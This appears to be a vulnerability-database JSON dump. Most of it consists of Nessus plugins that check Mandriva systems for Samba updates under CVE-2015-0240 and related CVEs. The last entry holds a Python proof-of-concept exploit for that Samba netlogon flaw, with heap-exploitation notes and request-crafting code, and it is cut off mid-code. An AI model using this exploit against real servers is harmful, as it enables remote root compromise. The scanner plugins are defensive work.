script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2019 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"lib64samba4-dc0-4.1.17-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"lib64samba4-devel-4.1.17-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"lib64samba4-smbclient-devel-4.1.17-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"lib64samba4-smbclient0-4.1.17-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"lib64samba4-test-devel-4.1.17-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"lib64samba4-test0-4.1.17-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"lib64samba4-wbclient-devel-4.1.17-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"lib64samba4-wbclient0-4.1.17-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"lib64samba41-4.1.17-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"python-samba4-4.1.17-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"samba4-4.1.17-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"samba4-client-4.1.17-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"samba4-common-4.1.17-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"samba4-dc-4.1.17-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", reference:\"samba4-pidl-4.1.17-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"samba4-test-4.1.17-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"samba4-vfs-glusterfs-4.1.17-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"samba4-winbind-4.1.17-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"samba4-winbind-clients-4.1.17-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"samba4-winbind-krb5-locator-4.1.17-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"samba4-winbind-modules-4.1.17-1.mbs2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T02:55:19", "bulletinFamily": "scanner", "description": "Updated samba packages fix security vulnerabilities :\n\nAn uninitialized pointer use flaw was found in the Samba daemon\n(smbd). A malicious Samba client could send specially crafted netlogon\npackets that, when processed by smbd, could potentially lead to\narbitrary code execution with the privileges of the user running smbd\n(by default, the root user) (CVE-2015-0240).", "modified": "2019-11-02T00:00:00", "id": "MANDRIVA_MDVSA-2015-081.NASL", "href": "https://www.tenable.com/plugins/nessus/82334", "published": "2015-03-30T00:00:00", "title": "Mandriva Linux Security Advisory : samba (MDVSA-2015:081)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2015:081. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(82334);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/08/02 13:32:56\");\n\n script_cve_id(\"CVE-2015-0240\");\n script_bugtraq_id(72711);\n script_xref(name:\"MDVSA\", value:\"2015:081\");\n\n script_name(english:\"Mandriva Linux Security Advisory : samba (MDVSA-2015:081)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated samba packages fix security vulnerabilities :\n\nAn uninitialized pointer use flaw was found in the Samba daemon\n(smbd). A malicious Samba client could send specially crafted netlogon\npackets that, when processed by smbd, could potentially lead to\narbitrary code execution with the privileges of the user running smbd\n(by default, the root user) (CVE-2015-0240).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2015-0084.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64netapi-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64netapi0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64smbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64smbclient0-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64smbclient0-static-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64smbsharemodes-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64smbsharemodes0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64wbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64wbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:nss_wins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba-domainjoin-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba-swat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba-virusfilter-clamav\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba-virusfilter-fsecure\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba-virusfilter-sophos\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/03/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2019 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lib64netapi-devel-3.6.25-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lib64netapi0-3.6.25-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lib64smbclient0-3.6.25-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lib64smbclient0-devel-3.6.25-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lib64smbclient0-static-devel-3.6.25-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lib64smbsharemodes-devel-3.6.25-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lib64smbsharemodes0-3.6.25-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lib64wbclient-devel-3.6.25-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lib64wbclient0-3.6.25-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"nss_wins-3.6.25-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"samba-client-3.6.25-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"samba-common-3.6.25-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"samba-doc-3.6.25-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"samba-domainjoin-gui-3.6.25-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"samba-server-3.6.25-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"samba-swat-3.6.25-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"samba-virusfilter-clamav-3.6.25-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"samba-virusfilter-fsecure-3.6.25-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"samba-virusfilter-sophos-3.6.25-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"samba-winbind-3.6.25-1.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T02:55:19", "bulletinFamily": "scanner", "description": "Updated samba packages fix security vulnerabilities :\n\nIn Samba before 3.6.23, the SAMR server neglects to ensure that\nattempted password changes will update the bad password count, and\ndoes not set the lockout flags. This would allow a user unlimited\nattempts against the password by simply calling ChangePasswordUser2\nrepeatedly. This is available without any other authentication\n(CVE-2013-4496).\n\nInformation leak vulnerability in the VFS code, allowing an\nauthenticated user to retrieve eight bytes of uninitialized memory\nwhen shadow copy is enabled (CVE-2014-0178).\n\nSamba versions before 3.6.24, 4.0.19, and 4.1.9 are vulnerable to a\ndenial of service on the nmbd NetBIOS name services daemon. A\nmalformed packet can cause the nmbd server to loop the CPU and prevent\nany further NetBIOS ame service (CVE-2014-0244).\n\nSamba versions before 3.6.24, 4.0.19, and 4.1.9 are affected by a\ndenial of service crash involving overwriting memory on an\nauthenticated connection to the smbd file server (CVE-2014-3493).\n\nAn uninitialized pointer use flaw was found in the Samba daemon\n(smbd). A malicious Samba client could send specially crafted netlogon\npackets that, when processed by smbd, could potentially lead to\narbitrary code execution with the privileges of the user running smbd\n(by default, the root user) (CVE-2015-0240).", "modified": "2019-11-02T00:00:00", "id": "MANDRIVA_MDVSA-2015-082.NASL", "href": "https://www.tenable.com/plugins/nessus/82335", "published": "2015-03-30T00:00:00", "title": "Mandriva Linux Security Advisory : samba (MDVSA-2015:082)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2015:082. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(82335);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/08/02 13:32:56\");\n\n script_cve_id(\"CVE-2013-4496\", \"CVE-2014-0178\", \"CVE-2014-0244\", \"CVE-2014-3493\", \"CVE-2015-0240\");\n script_xref(name:\"MDVSA\", value:\"2015:082\");\n\n script_name(english:\"Mandriva Linux Security Advisory : samba (MDVSA-2015:082)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated samba packages fix security vulnerabilities :\n\nIn Samba before 3.6.23, the SAMR server neglects to ensure that\nattempted password changes will update the bad password count, and\ndoes not set the lockout flags. This would allow a user unlimited\nattempts against the password by simply calling ChangePasswordUser2\nrepeatedly. This is available without any other authentication\n(CVE-2013-4496).\n\nInformation leak vulnerability in the VFS code, allowing an\nauthenticated user to retrieve eight bytes of uninitialized memory\nwhen shadow copy is enabled (CVE-2014-0178).\n\nSamba versions before 3.6.24, 4.0.19, and 4.1.9 are vulnerable to a\ndenial of service on the nmbd NetBIOS name services daemon. A\nmalformed packet can cause the nmbd server to loop the CPU and prevent\nany further NetBIOS ame service (CVE-2014-0244).\n\nSamba versions before 3.6.24, 4.0.19, and 4.1.9 are affected by a\ndenial of service crash involving overwriting memory on an\nauthenticated connection to the smbd file server (CVE-2014-3493).\n\nAn uninitialized pointer use flaw was found in the Samba daemon\n(smbd). A malicious Samba client could send specially crafted netlogon\npackets that, when processed by smbd, could potentially lead to\narbitrary code execution with the privileges of the user running smbd\n(by default, the root user) (CVE-2015-0240).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2014-0138.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2014-0279.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2015-0084.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64netapi-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64netapi0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64smbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64smbclient0-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64smbclient0-static-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64smbsharemodes-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64smbsharemodes0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64wbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64wbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:nss_wins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba-domainjoin-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba-swat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba-virusfilter-clamav\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba-virusfilter-fsecure\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba-virusfilter-sophos\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:samba-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/03/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2019 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"lib64netapi-devel-3.6.25-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"lib64netapi0-3.6.25-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"lib64smbclient0-3.6.25-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"lib64smbclient0-devel-3.6.25-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"lib64smbclient0-static-devel-3.6.25-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"lib64smbsharemodes-devel-3.6.25-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"lib64smbsharemodes0-3.6.25-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"lib64wbclient-devel-3.6.25-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"lib64wbclient0-3.6.25-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"nss_wins-3.6.25-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"samba-client-3.6.25-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"samba-common-3.6.25-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", reference:\"samba-doc-3.6.25-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"samba-domainjoin-gui-3.6.25-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"samba-server-3.6.25-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"samba-swat-3.6.25-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"samba-virusfilter-clamav-3.6.25-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"samba-virusfilter-fsecure-3.6.25-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"samba-virusfilter-sophos-3.6.25-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"samba-winbind-3.6.25-1.mbs2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-03-13T16:16:03", "bulletinFamily": "exploit", "description": "Exploit for linux platform in category dos / poc", "modified": "2015-04-15T00:00:00", "published": "2015-04-15T00:00:00", "id": "1337DAY-ID-23513", "href": "https://0day.today/exploit/description/23513", "type": "zdt", "title": "Samba < 3.6.2 x86 - PoC", "sourceData": "#!/usr/bin/python\r\n\"\"\"\r\nExploit for Samba vulnerabilty (CVE-2015-0240) by sleepya\r\n \r\nThe exploit only targets vulnerable x86 smbd <3.6.24 which 'creds' is controlled by\r\nReferentID field of PrimaryName (ServerName). That means '_talloc_zero()'\r\nin libtalloc does not write a value on 'creds' address.\r\n \r\nReference:\r\n- https://securityblog.redhat.com/2015/02/23/samba-vulnerability-cve-2015-0240/\r\n \r\nNote:\r\n- heap might be changed while running exploit, need to try again (with '-hs' or '-pa' option)\r\n if something failed\r\n \r\nFind heap address:\r\n- ubuntu PIE heap start range: b7700000 - b9800000\r\n- start payload size: the bigger it is the lesser connection and binding time.\r\n but need more time to shrink payload size\r\n- payload is too big to fit in freed small hole. so payload is always at end\r\n of heap\r\n- start bruteforcing heap address from high memory address to low memory address\r\n to prevent 'creds' pointed to real heap chunk (also no crash but not our payload)\r\n \r\nLeak info:\r\n- heap layout is predictable because talloc_stackframe_pool(8192) is called after\r\n accepted connection and fork but before calling smbd_server_connection_loop_once()\r\n- before talloc_stackframe_pool(8192) is called, there are many holes in heap\r\n but their size are <8K. so pool is at the end of heap at this time\r\n- many data that allocated after talloc_stackframe_pool(8192) are allocated in pool.\r\n with the same pattern of request, the layout in pool are always the same.\r\n- many data are not allocated in pool but fit in free holes. so no small size data are\r\n allocated after pool.\r\n- normally there are only few data block allocated after pool.\r\n - pool size: 0x2048 (included glibc heap header 4 bytes)\r\n - a table that created in giconv_open(). the size is 0x7f88 (included glibc heap header 4 bytes)\r\n - p->in_data.pdu.data. the size is 0x10e8 (included glibc heap header 4 bytes)\r\n - this might not be allocated here because its size might fit in freed hole\r\n - all fragment should be same size to prevent talloc_realloc() changed pdu.data size\r\n - so last fragment should be padded\r\n - ndr DATA_BLOB. the size is 0x10d0 (included glibc heap header 4 bytes)\r\n - this might not be allocated here because its size might fit in freed hole\r\n - p->in_data.data.data. the size is our netlogon data\r\n - for 8K payload, the size is 0x2168 (included glibc heap header 4 bytes)\r\n - this data is allocated by realloc(), grew by each fragment. so this memory\r\n block is not allocated by mmapped even the size is very big.\r\n- pool layout for interested data\r\n - r->out offset from pool (talloc header) is 0x13c0\r\n - r->out.return_authenticator offset from pool is 0x13c0+0x18\r\n - overwrite this (with link unlink) to leak info in ServerPasswordSet response\r\n - smb_request offset from pool (talloc header) is 0x11a0\r\n - smb_request.sconn offset from pool is 0x11a0+0x3c\r\n - socket fd is at smb_request.sconn address (first struct member)\r\n- more shared folder in configuration, more freed heap holes\r\n - only if there is no or one shared, many data might be unexpected allocated after pool.\r\n have to get that extra offset or bruteforce it\r\n \r\n \r\nMore exploitation detail in code (comment) ;)\r\n\"\"\"\r\n \r\nimport sys\r\nimport time\r\nfrom struct import pack,unpack\r\nimport argparse\r\n \r\nimport impacket\r\nfrom impacket.dcerpc.v5 import transport, nrpc\r\nfrom impacket.dcerpc.v5.ndr import NDRCALL\r\nfrom impacket.dcerpc.v5.dtypes import WSTR\r\n \r\n \r\nclass Requester:\r\n \"\"\"\r\n put all smb request stuff into class. help my editor folding them\r\n \"\"\"\r\n \r\n # impacket does not implement NetrServerPasswordSet\r\n # 3.5.4.4.6 NetrServerPasswordSet (Opnum 6)\r\n class NetrServerPasswordSet(NDRCALL):\r\n opnum = 6\r\n structure = (\r\n ('PrimaryName',nrpc.PLOGONSRV_HANDLE),\r\n ('AccountName',WSTR),\r\n ('SecureChannelType',nrpc.NETLOGON_SECURE_CHANNEL_TYPE),\r\n ('ComputerName',WSTR),\r\n ('Authenticator',nrpc.NETLOGON_AUTHENTICATOR),\r\n ('UasNewPassword',nrpc.ENCRYPTED_NT_OWF_PASSWORD),\r\n )\r\n # response is authenticator (8 bytes) and error code (4 bytes)\r\n \r\n # size of each field in sent packet\r\n req_server_handle_size = 16\r\n req_username_hdr_size = 4 + 4 + 4 + 2 # max count, offset, actual count, trailing null\r\n req_sec_type_size = 2\r\n req_computer_size = 4 + 4 + 4 + 2\r\n req_authenticator_size = 8 + 2 + 4\r\n req_new_pwd_size = 16\r\n req_presize = req_server_handle_size + req_username_hdr_size + req_sec_type_size + req_computer_size + req_authenticator_size + req_new_pwd_size\r\n \r\n samba_rpc_fragment_size = 4280\r\n netlogon_data_fragment_size = samba_rpc_fragment_size - 8 - 24 # 24 is dcerpc header size\r\n \r\n def __init__(self):\r\n self.target = None\r\n self.dce = None\r\n \r\n sessionKey = '\\x00'*16\r\n # prepare ServerPasswordSet request\r\n authenticator = nrpc.NETLOGON_AUTHENTICATOR()\r\n authenticator['Credential'] = nrpc.ComputeNetlogonCredential('12345678', sessionKey)\r\n authenticator['Timestamp'] = 10\r\n \r\n uasNewPass = nrpc.ENCRYPTED_NT_OWF_PASSWORD()\r\n uasNewPass['Data'] = '\\x00'*16\r\n \r\n self.serverName = nrpc.PLOGONSRV_HANDLE()\r\n # ReferentID field of PrimaryName controls the uninitialized value of creds\r\n self.serverName.fields['ReferentID'] = 0\r\n \r\n self.accountName = WSTR()\r\n \r\n request = Requester.NetrServerPasswordSet()\r\n request['PrimaryName'] = self.serverName\r\n request['AccountName'] = self.accountName\r\n request['SecureChannelType'] = nrpc.NETLOGON_SECURE_CHANNEL_TYPE.WorkstationSecureChannel\r\n request['ComputerName'] = '\\x00'\r\n request['Authenticator'] = authenticator\r\n request['UasNewPassword'] = uasNewPass\r\n self.request = request\r\n \r\n def set_target(self, target):\r\n self.target = 